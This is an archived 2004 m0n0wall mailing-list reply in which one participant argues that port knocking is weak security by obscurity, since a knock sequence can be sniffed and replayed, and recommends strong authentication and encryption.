[ previous ] [ next ] [ threads ]
 
 From:  Bart Smit <bit at pipe dot nl>
 To:  Adam Nellemann <adam at nellemann dot nu>
 Cc:  "m0n0wall at lists dot m0n0 dot ch" <m0n0wall at lists dot m0n0 dot ch>
 Subject:  Re: [m0n0wall] Port Knocking?
 Date:  Sun, 08 Feb 2004 01:59:15 +0100
Adam Nellemann wrote:

 > How would you go about "trivally sniffing" a seemingly random sequence
 > of packets, bound for various ports on the "target" box?

By filtering on IP packets with the SYN flag set, in short succession, 
to the same destination address?

I bet you've never seen ethereal. Go on. Download it. Play with it.

 > Bearing in mind
 > that any reasonable intelligent "knocking client" would intersperse
 > the real "knocks" with various bogus packets for ports not part of 
the > list of "knocker ports" (which would be, at least initally, 
unknown to > the hacker), in addition to various other presented schemes 
to further
 > "obfuscate" the knocking sequence (such as time-stamping etc.)

So what? None of this is immune to a simple replay. Not that you can't
think of even more secret tricks to circumvent *that* (go on, take a
hash of the source IP so all the ports and times change! that'll keep
you safe until someone reverse engineers m0n0wall and figures out the
hash).

I didn't say you can't think of ways to make it even more obscure!

Now I've said the word. Obscure. Security by obscurity has the obvious 
advantage that you can keep making it stronger all the time. ;-)

 > Personally, I still think it a nice feature for m0n0wall.

It's ridiculous.

Exactly because you consider yourself a "home user" (I think that you 
mean that in the sense of "relatively unsophisticated") you'd better 
rely on strong authentication and encryption methods instead of trying 
to come up with a supposedly "difficult to crack" port knocking scheme, 
which you have no way of assessing the safety of.

Let me answer the last one for you: you must assume that it's only safe 
against the most casual type of attack. Not the stuff a vendor would or 
should include in a firewall product.

--B